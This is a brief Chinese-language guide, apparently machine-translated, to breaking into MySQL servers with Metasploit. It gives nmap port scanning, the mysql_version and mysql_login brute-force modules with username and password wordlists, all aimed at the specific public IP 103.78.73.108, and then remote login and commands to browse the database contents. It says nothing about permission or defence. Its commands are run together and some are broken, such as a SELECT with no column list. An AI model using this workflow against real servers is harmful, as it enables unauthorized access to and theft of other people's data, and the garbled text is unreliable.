Metasploit是一个多功能工具,非常支持利用,因为在本文中,我将通过使用Metasploit在MySQL上执行暴力破解来分享有关数据库利用的技巧。但在继续之前,请确保您已在终端中安装了metasploit,如果您尚未安装metasploit https://www.metasploit.com,请在以下网址下载。
此外,在进行暴力破解MySQL之前,您还需要NMAP之类的信息收集工具来进行端口扫描,Nmap本身具有许多功能,而不仅仅是端口扫描。
首先,请打开nmap进行端口扫描,目标服务器上是否有mysql服务运行。
nmap website.com
在上图中,可以看到如果 mysql 端口是 3306,那么我们继续使用以下命令运行 metasploit。
sudo msfconsoleuse mysql_versionset RHOSTS 103.78.73.108run
然后,还将模块mysql_login设置为使用以下命令暴力破解目标mysql。
use mysql_loginset RHOSTS 103.78.73.108set USERNAME root在“用户名”部分中,您还可以使用已创建的用户名列表,或者输入用户名,例如在根或其他内容上方。如果要使用单词列表用户名,请使用以下命令进行设置。
set USER_FILE /<em>home/kali/userlist.txt</em>将 /home/kali/userlist.txt 替换为用户列表的位置。
set PASS_FILE/home/kali/<em>passlist</em>.txt将 /home/kali/passlist.txt 替换为密码列表的位置。
然后使用以下命令运行该模块。
run等到metasploit完成它的工作,如果成功模块会自动停止并显示mysql用户名和密码。下面是结果的示例。
如果你现在得到了目标mysql的用户名和密码,我们只需要远程做远程mysql,但是如果你有mysql登录的东西,这部分就被跳过了。
telnet ip 3306
mysql -u username -h 103.78.73.108 -p然后,如果MySQL远程成功,结果将如下图所示。
如果是这样,你只需要oprek数据库,或者如果你真的不知道mysql命令,我可以在下面帮助你一些基本的命令。
show databases;此命令用于查看数据库名称
use namadatabase输入数据库的命令
show tables;用于查看 batabase 内的娜娜表
select from nama_columns;用于查看数据库列的内容
